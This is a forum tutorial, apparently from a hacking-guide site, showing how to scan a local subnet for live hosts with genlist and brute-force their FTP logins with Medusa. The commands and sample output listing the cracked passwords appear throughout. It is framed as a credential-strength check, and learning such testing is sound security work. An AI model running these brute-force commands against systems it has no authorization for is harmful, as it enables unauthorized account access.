Forum Thread: Checking the Weakness of FTP Credentials Enter with Medusa . [ by: Mohamed Ahmed ]

This guide will show you how to perform a simple ftp or any other service that supports Medusa to check the weakness of the login data.

I will be using genlist to compile a list of the live hosts that are running on the network and have result in a txt file that Medusa can use to perform a brute force attack on all hosts live

I'll start with the path to find the range the network is using

code
mohamedx@kl:~# route -n |grep eth1
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
0.0.0.0 192.168.1.254 0.0.0.0 UG 0 0 0 eth1
mohamedx@kl~#

In the above example on the network that I am connected to you are using the IP range 192.168.1.0 and the

default gateway 192.168.1.254, so I will analyze the whole netmask for hosts to live with genlist

Code
mohamedx@kl:~# genlist -s 192.168.1.\* > host_c-intruder3s
mohamedx@kl:~# cat host_c-intruder3s
192.168.1.67
192.168.1.68
192.168.1.69
192.168.1.77
192.168.1.78
192.168.1.101
192.168.1.254
mohamedx@kl:~#

Now I have obtained a list of live hosts I can go to use Medusa

Code:
medusa -v 6 -H host_c-intruder3s -U username.txt -P pwords.txt -M ftp

  • Medusa Options

Code:
-v level of detail six
H- Customer List
-U list Username
-P list Password
-M FTP module type, TELNET, SSH, HTTP, etc.

Note For this tutorial I will only use a small user / password List To save time

My output

mohamedx@kl: ~ # medusa -v 6 -H host_c-intruder3s -U username.txt -P pwords.txt -M ftp | grep "ACCOUNT FOUND"
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
ACCOUNT FOUND: ftp Host: 192.168.1.67 User: zerocold Password: password123 SUCCESS
ACCOUNT FOUND: ftp Host: 192.168.1.67 User: offsec Password: password SUCCESS
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
ACCOUNT FOUND: ftp Host: 192.168.1.68 User: michael Password: jhonadmin SUCCESS
ACCOUNT FOUND: ftp Host: 192.168.1.77 User: rafael Password: admin123 SUCCESS
mohamedx@kl: ~ #

In the previous example I used | grep "account is found" to cut most of the output, so I only receive user names and passwords, but if I were to do this on the actual target it is not my home network i running normally so I can see to what extent the attack is on.

greetings // M.Ahmed

Never Miss a Hacking or Security Guide

New Null Byte in your inbox, every week.

3 Responses

Share Your Thoughts

  • Hot
  • Active